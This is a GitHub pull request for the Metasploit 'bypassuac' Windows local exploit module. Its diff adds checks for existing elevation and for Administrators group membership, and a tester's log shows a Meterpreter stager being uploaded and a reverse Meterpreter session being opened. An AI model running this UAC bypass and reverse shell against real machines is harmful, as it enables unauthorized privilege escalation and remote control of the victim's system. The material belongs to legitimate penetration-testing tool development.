Skip to content
This repository

add admin already and admin group checks #1067

Merged
merged 2 commits into from over 1 year ago

2 participants

Rob Fuller sinn3r
Rob Fuller

adds check to see if already in admin mode
as well as checking to see if the user is in the local admins group in order to bypass UAC

sinn3r
Collaborator

Review in progress....

sinn3r
Collaborator

tested:

[*] Started reverse handler on 10.0.1.3:4444 
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Sending stage (752128 bytes) to 10.0.1.10
[*] Meterpreter session 5 opened (10.0.1.3:4444 -> 10.0.1.10:49181) at 2012-11-16 11:50:02 -0600
sinn3r wchen-r7 merged commit e18acf2 into from November 16, 2012
sinn3r wchen-r7 closed this November 16, 2012
Rob Fuller mubix deleted the branch December 21, 2012
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Showing 2 unique commits by 1 author.

Nov 14, 2012
Rob Fuller add admin already and admin group checks 7d41f1f
Rob Fuller remove debugging code e18acf2
This page is out of date. Refresh to see the latest.
30  modules/exploits/windows/local/bypassuac.rb
@@ -50,6 +50,11 @@ def initialize(info={})
50 50
 
51 51
 	def exploit
52 52
 
  53
+		isadmin = session.railgun.shell32.IsUserAnAdmin()
  54
+		if isadmin['return']
  55
+			print_error('Already in elevated state. Exiting...')
  56
+			return
  57
+		end
53 58
 
54 59
 		#
55 60
 		# Verify use against Vista+
@@ -95,6 +100,31 @@ def exploit
95 100
 			return
96 101
 		end
97 102
 
  103
+		# Check if you are an admin
  104
+		print_status('Checking admin status...')
  105
+		whoami = session.sys.process.execute('cmd /c whoami /groups', 
  106
+			nil,
  107
+			{'Hidden' => true, 'Channelized' => true}
  108
+			)
  109
+		cmdout = []
  110
+		isinadmins = []
  111
+		while(cmdoutput = whoami.channel.read)
  112
+			cmdout << cmdoutput
  113
+		end
  114
+		if cmdout.size == 0
  115
+			print_error('Either whoami is not there or failed to execute')
  116
+			print_error('Continuing under assumption you already checked...')
  117
+		else
  118
+			isinadmins = cmdout[0].split("\r\n").grep(/S-1-5-32-544/)
  119
+			if isinadmins.size > 0
  120
+				print_good('Part of Administrators group! Continuing...')
  121
+			else
  122
+				print_error('Not in admins group, cannot escalate with this module')
  123
+				print_error('Exiting...')
  124
+				return
  125
+			end
  126
+		end
  127
+
98 128
 		#
99 129
 		# Generate payload and random names for upload
100 130
 		#
Commit_comment_tip

Tip: You can add notes to lines in a file. Hover to the left of a line to make a note

Something went wrong with that request. Please try again.